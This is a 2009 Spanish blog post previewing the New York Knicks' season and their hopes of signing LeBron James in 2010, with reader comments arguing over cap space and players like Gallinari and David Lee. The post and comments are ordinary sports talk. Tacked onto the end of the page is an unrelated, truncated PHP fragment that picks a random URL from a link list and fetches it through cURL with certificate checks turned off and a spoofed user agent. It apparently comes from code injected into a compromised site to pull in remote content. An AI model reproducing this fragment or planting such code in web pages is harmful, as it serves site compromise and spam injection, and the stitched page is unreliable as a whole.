New York Knicks: Pensando en 2010 sin olvidar 2009

01 de October de 2009 por txusma

No creo que sorprenda a nadie si digo que los Knicks hace mucho que sueñan con el verano del 2010 y con jugadores como Lebron James, Dwyane Wade o Chris Bosh. Desde que Donnie Walsh llegó a la franquicia, allá por el 2 de Abril de 2008, todos los movimientos han ido encaminados en una sola dirección: obtener espacio salarial para llegar al final de esta temporada en las mejores condiciones para fichar al elenco de estrellas que habrá en el mercado. Y entre todas las estrellas destaca una, King James.

En el análisis que presentamos de los Cavs ya comentamos que la franquicia de Ohio estaba haciendo todo lo posible por rodear al fenomenal alero de un gran equipo y por ganar el anillo este mismo año, anillo que hiciera decidirse a Lebron a renovar. Pero, ¿qué le empujaría a dejar el equipo con el que juega desde que llegó a la liga y firmar, precisamente, por New York? Y es que analicemos los jugadores que, de momento, tienen contrato más allá de este verano: Curry, Jeffries, Gallinari, Jordan Hill y Wilson Chandler. Evidentemente, el fichaje de Lebron no será el único pero, ¿serán capaces de construir en un solo verano un equipo ganador con semejantes mimbres? ¿Serán capaces de hacerlo después de haber ninguneado durante todo el verano a 2 jugadores tan importantes como David Lee y Nate Robinson? Y es aquí cuando nos damos cuenta de la importancia que tiene para la franquicia que jugadores como Gallinari, Chandler o Hill hagan una buena temporada. La premisa es clara: hay que convencer a Lebron de que estos chicos son muy, muy buenos y después ya veremos que más fichamos.

La cuestión es que, tras todos los rumores que involucraban a los Knicks en verano, la plantilla es casi la misma que la que acabó el año pasado. Es la misma pero mejor porque ahora dispondrán de un Danilo Gallinari sano y de un Eddie Curry que parece que quiere volver a jugar a baloncesto. Si tenemos en cuenta que el año pasado ya ganaron 32 partidos podríamos suponer que este año darán un poquito más de guerra.

Chris Duhon seguirá siendo el base titular de este equipo y los 11 puntos y 7 asistencias que se marcó el año pasado son credenciales suficientes para que nadie tenga que desconfiar de él. En los puestos de escolta y alero las posibilidades se multiplican. Nate Robinson, Larry Hughes, Danilo Gallinari y Wilson Chandler se repartirán los minutos en un juego exterior que admite muchas posibilidades. Lo más probable es que sean Larry Hughes y Wilson Chandler los que salgan de inicio y Nate Robinson actue como sexto hombre ocupando las posiciones de base o escolta. Seguramente Gallinari, el mejor tirador que ha vista D’Antoni según palabras de él mismo, sea el séptimo jugador que más minutos dispute dando descanso a Chandler y jugando varios minutos como escolta, que es lo que está entrenando en este pretemporada. Si Gallinari es capaz de defender a jugadores a priori más rápidos que él, daría muchísimos problemas en el momento de atacar.

El juego interior será con toda seguridad para Al Harrington y David Lee, dos jugadores perfectamente adaptados a la idea de correr que tiene Mike D’Antoni en la cabeza, idea que tendrá que modificar levemente cuando aparezcan en pista Darko Milicic o Eddie Curry. En cambio, el rookie Jordan Hill encaja como anillo al dedo y no nos debería sorprender si vemos que se convierte en el primer recambio del juego interior titular. Si Hill progresa y pule sus defectos (principalmente a la hora de encarar el aro y de evitar las faltas) podría convertirse, salvando las distancias, en el Amare Stoudamire de los Knicks. Me refiero al estilo de jugador: mucha velocidad, mucha potencia y mucha estadística.  Como comodín en casi todas las posiciones aparece un Jared Jeffries que si rindiera a la par de lo que cobra sería sin duda la clave de este equipo.

Walsh y D’Antoni siguen con la mirada centrada en el verano del 2010 pero mientras, han construído un equipo que, si se mantiene sano, parece capaz de luchar por las últimas posiciones de los Playoffs del Este. Eso sí, para conseguirlo deberá mantener el tono ofensivo de la pasada temporada pero mejorar muchísimo en defensa. El año pasado los Knicks fueron el tercer equipo que más puntos permitía a sus contrarios y así no se va a ninguna parte. Más vale que hagan una buena temporada porque Lebron, Wade y algún otro seguro que los vigilan de cerca.

Quinteto: Chris Duhon, Larry Hughes, Wilson Chandler, Al Harrington, David Lee

Sexto Hombre: Nate Robinson

Pronóstico: Fuera de Playoffs

Comenta

16 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Bueno, en teoría lo que llamaría a LeBron por firmar con los Knicks sería la mercadotecnia, que podría ser brutal.
    Hace no mucho, leí un artículo me parece que de Paniagua, que venía a decir (hablo de memoria) que NIKE se había arrepentido de firmar a LeBron un contrato rollo Jordan porque no estaba cumpliendo ni de lejos las expectativas.
    Solo fichar con los Knicks, sin pensar ni siquiera en títulos todavía, supondría un salto de ventas que podríamos flipar (aunque dudo que eso sería cumplir exáctamente “esas expectativas” de ser el “nuevo Jordan”) Lógicamente habrá un montón de presiones interesadas alrededor del chaval para que se largue de Cleveland, independientemente de los criterios deportivos.
    Una vez en New York, la construcción de un proyecto ganador alrededor suyo (sobre todo en una franquicia acostumbrada a poner la pasta aunque sea para perder) sería bastante más fácil.

    En cualquier caso, yo sigo pensando que LeBron no puede permitirse el perder 2-3 años en el experimento… porque en Cleveland ya tiene mucho camino andado.
    De todas formas, como ya dijo alguno en el análisis de los Cavs… si este año no gana ya habría que plantearse qué es exáctamente lo que necesita El Elegido para ganar o si se está siendo realista con ese enfoque, porque ciertamente se lo han dado todo.

    PD: Y cuidado… porque el nombre de un tal Mikhail Prokhorov se podría cruzar pronto y con mucha fuerza contra los intereses de Cavs y Knicks.

      Citar

  2. pcerezo dice:
    #2

    Es triste que hablar de los Knicks es hablar de la temporada 2010.
    Me encantaría que el verano que viene fuera de susto en susto, de noticia en noticia, de sorpresa en sorpresa, pero puede que al final se quede en fuegos artificiales.

    El drama de los Knicks puede ser si no acceden a ningún agente libre en condiciones. Cuál es el futuro que le espera? Puede ser terrible.

    En cuanto a Lebron en Nueva York es para pensárselo desde el punto de vista deportivo. Está claro que con el pastizal que ganaría se podría compra su pueblo natal entero pero amigo las victorias….Porque no nos engañemos los Lakers tienen equipo para un par de años más y hacer en 2010 un equipo para ganárles resulta muy, muy complicado.

    Amén.

    Pablo

      Citar

  3. kantonyo dice:
    #3

    Me parece muy triste que una franquicia como NYK, tire a la basura varias temporadas de esta forma…

    Y además, traten así de mal a un gran jugador como David Lee. Que pena que Portland no se ha podido hacer con sus derechos, le vendría de lujo a la plantilla de Oregon.

    El poco interes que tengo de ver la trayectoria de este equipo durante este año es la progresión de Gallinari, del que mucha gente habla maravillas, pero yo personalmente creo que no ha demostrado nada, veremos como lo hace en su segundo año en una franquicia en la que va a tener minutos de la basura para aburrir.

    No los veo en playoffs, apuesto por 20-30 victorias este año si no cambian las cosas.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    “Nuevo Jordan” o “Nuevo Maradona de los Cárpatos” han habido unos cuantos.

    Yo apuesto por la mejora de las 32 victorias. Milicic, aporta un una leve mejora defensiva, y muchos lastres. Gallinari igual está sano. Y cuidado con el “Amaré de la gran Manzana”.

      Citar

  5. Dantley2 dice:
    #5

    Ojo, que lo que estaban intentando no era tener espacio para LeBron, es tener espacio para dos contratos máximos y creo que lo han conseguido, aunque habría que revisar las cifras. Si es así estamos hablando de que podrían tener al mismo tiempo a dos entre LeBron, Wade, Bosh y Amare. Imaginemos que son LeBron y Bosh/Amare (por aquello de la posibilidad de Wade en Chicago). A eso le unes un base decente tipo Duhon, a lo que se espera que sea Gallinari, a Chandler que es completísimo y aún tiene margen de mejora, quizá a Lee renovado y a una midlevel, eso huele a título.

    Este año intentarán lo que perfectamente has comentado, hacer que los secundarios de LeBron salgan favorecidos en la foto. Si eso da para 30 o 40 victorias y rozar playoffs ya es mucho afinar.

      Citar

  6. TheDeerHunter dice:
    #6

    Dantley… todo eso está muy bien, pero si te he de ser sincero me suena al cuento de la lechera.
    En los últimos años también hemos asistido a otros intentos de juntar dos o tres grandes jugadores en un mismo equipo y, o bien no termina de concretarse (ejemplo los Clippers el año pasado) o no termina de funcionar (ejemplo los Nets de la “tríada”)
    Voy a discrepar contra la corriente pro-David Lee que se ha instaurado. El tipo es un buen elemento, pero ¿contrataco de 60 kilakos como pedía??? yo no se lo firmaba ni drogado. Hay que ver cómo han terminado los que pretendían subirse a la parra este año. (ni un duro más para casi nadie)

    PD: Yo también estoy deseando ver de qué pasta está hecho Gallinari.

      Citar

  7. TheDeerHunter dice:
    #7

    Y un apunte más… que los límites salariales se están reduciendo peligrosamente. A ver si tampoco va a dar para firmar dos máximos

      Citar

  8. Txusma dice:
    #8

    No creo q tengan muchos problemas en NY en saltarse los limite que haga falta. Por lo que veo estamos de acuerdo en que el progreso de Gallinari es lo mas interesante de la temporada 2009/2010 de los NY. Si este año es capaz de cumplir la mitad de las expectativas que levanta ya sera todo un éxito.

      Citar

  9. sergio dice:
    #9

    Supongo que si se reducen los limites salariales tambien se reduciran los incrementos por año en los contratos y los contratos en general especialmente para segundas espadas de los equipos… la crisis no es solo de los equipos… tambien pagan los jugadores.

    Respecto a NYK, creo que hicieron este año 32 victorias y pueden rondar las mismas este año por el sistema de juego de D’Antoni que lo mismo te hace ganar a Lakers o Cavaliers un dia acertado (que no lo han hecho) que perder contra Sacramento de 30 en otro malo… Desde luego es algo que crea espectaculo, tapa carencias y aumenta el numero de aficionados pero si lebron es listo veo mas inteligente irse a equipos como Chicago o New Jersey que tambien tienen presupuestos altos y un equipo bastante mas hecho. En el caso de NJ no habra problemas para salarios con el nuevo propietario (y la gente de NY se iria a ver el basket a Brooklyn, donde esta el nuevo estadio) y Chicago puede crear la misma mercadotecnia o similar que NYK… o es que alguien no tiene ganas de ver otro 23 en Chicago, que es 2ª o 3ª franquicia mas valiosa de la NBA y 3ª ciudad en habitantes de america…???

      Citar

  10. Dantley2 dice:
    #10

    Sí, sí, es cuento de la lechera, pero no han firmado a Sessions justamente por eso, y han tensado la cuerda con Nate Robinson y Lee (de acuerdo con que 60 es una barbaridad) para que sólo firmen un año. Es más, incluso hubo rumores de comprarle el contrato a Jeffries para poder bajar aunque fuera 500.000 dólares más.

    Está todo medido incluso con la esperada bajada del límite salarial. El hecho es que tienen hueco para dos megacracks. La realidad probablemente será que se quedarán con uno o ninguno, pero si así fuera aún tendrán espacio para dos “Odoms en tiempos de crisis” y un equipo Duhon-Chandler/Gallinari-Odom1-Odom2-Amare da para playoffs y pelear. No da para título, pero es una mejora tremenda.

      Citar

  11. TheDeerHunter dice:
    #11

    Muy bien, Dantley… estoy de acuerdo.
    En realidad, lo que defiendes es que los Knicks han dado un muy buen paso para salir del agujero negro en el que estaban instalados hace ahora un año. Se ha librado de alguno de los megacontratos basura, como también alguno de los cánceres que tenía en el vestuario, que le lastraban como uno de los equipos con peores expectativas para mucho tiempo… y lo ha hecho con sólo uno/dos años perdidos (y al menos el año pasado con no tan malos resultados como hace nada) Tiene mérito… y yo lo reconozco. Estoy sinceramente de acuerdo (no es coña)
    Lo que yo digo es que con todo a mí no me parece un destino apetecible para LeBron (ni para ningún otro jugador con verdaderas aspiraciones) si dejamos de lado el tema económico. Ni tampoco me parece que lo pueda ser el verano que viene a no ser que este año se salgan por todos lados (cosa que no creo, para nada)

      Citar

  12. Txusma dice:
    #12

    Yo estoy con Jose pero aun dando mas importancia al papel de Gallinari y Chandler. Si estos 2 hacen una buena temporada los Knicks ya tendran mucho ganado pero como se les ocurra cagarla no van a oler a Lebron ni en pintura y a lo mejor se han de contentar con Michael Redd.
    Y es q el quinteto que comenta Jose o alguno con Lebron mas las tipicas adquisiciones de veteranos (q son las q acaban apuntalando los equipos) no difieren mucho de las plantillas que ha tenido Cleveland estos ultimos años y todos estamos de acuerdo en q los Cavs siempre han sido candidatos al titulo.

      Citar

  13. Jabho dice:
    #13

    No sé si será Lebron, que será difícil, pero Bosh y Amare no parecen muy a gusto en su equipo y oyes, para empezar seria buena cosa. Wade no sé, ya ganó el anillo y podría tener mas paciencia pero no le veo cerca.

    La cosa es que viniendo de donde vienen tienen muchísimo merito. Y si no pescan a nadie y tienen que acabar soltando la pasta por Lee pues tampoco habrían perdido tanto. Bien por Walsh y D´antoni. Camino acertado hasta ahora…

      Citar

  14. Dantley2 dice:
    #14

    Está claro que por orden los premios gordos son LeBron – Wade y después Amare-Bosh (el orden dependerá de la salud). Pero hagamos un repaso de lo que viene el 2010 además de esos 4:

    Joe Johnson
    Ray Allen
    Felton
    Ilgauskas/Shaq
    McGrady
    TJ Ford
    Jermaine
    Grant Hill
    Boozer
    Mike Miller
    Haywood

    Supongamos que llega el más fácil, Bosh. Quedarían unos 18 kilos para dos o tres fichajes, más luego la midlevel y la bianual. Se pueden sacar un base rápido sea Felton o Tj Ford y quizá a Boozer con el riesgo que conlleva, o dejarlo para Lee. O llenar el equipo de veteranos como Shaq o Hill, más el base.

    Difícil, pero la preseason 2010 va a ser divertida.

      Citar

  15. Viva_Dirk dice:
    #15

    Van a estar en torno a las 30-35 victorias salvo que alguno de los jóvenes explote de manera exagerada, pero están haciendo un buen trabajo.

    Yo creo que Duhon-J.Johnson-Gallinari-Lee-Bosh es un tremendo quinteto para el año que viene, si llega Lebron, mejor que mejor para ellos.

      Citar

  16. Landrusski dice:
    #16

    Yo comprato la opinion generalizada que hay sobre NY quiero ver si explota gallinari…y por cierto yo veo acertadisimo el camino que estan llevando los knicks para llegar al mercado de 2010 con un pastizal del 15

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>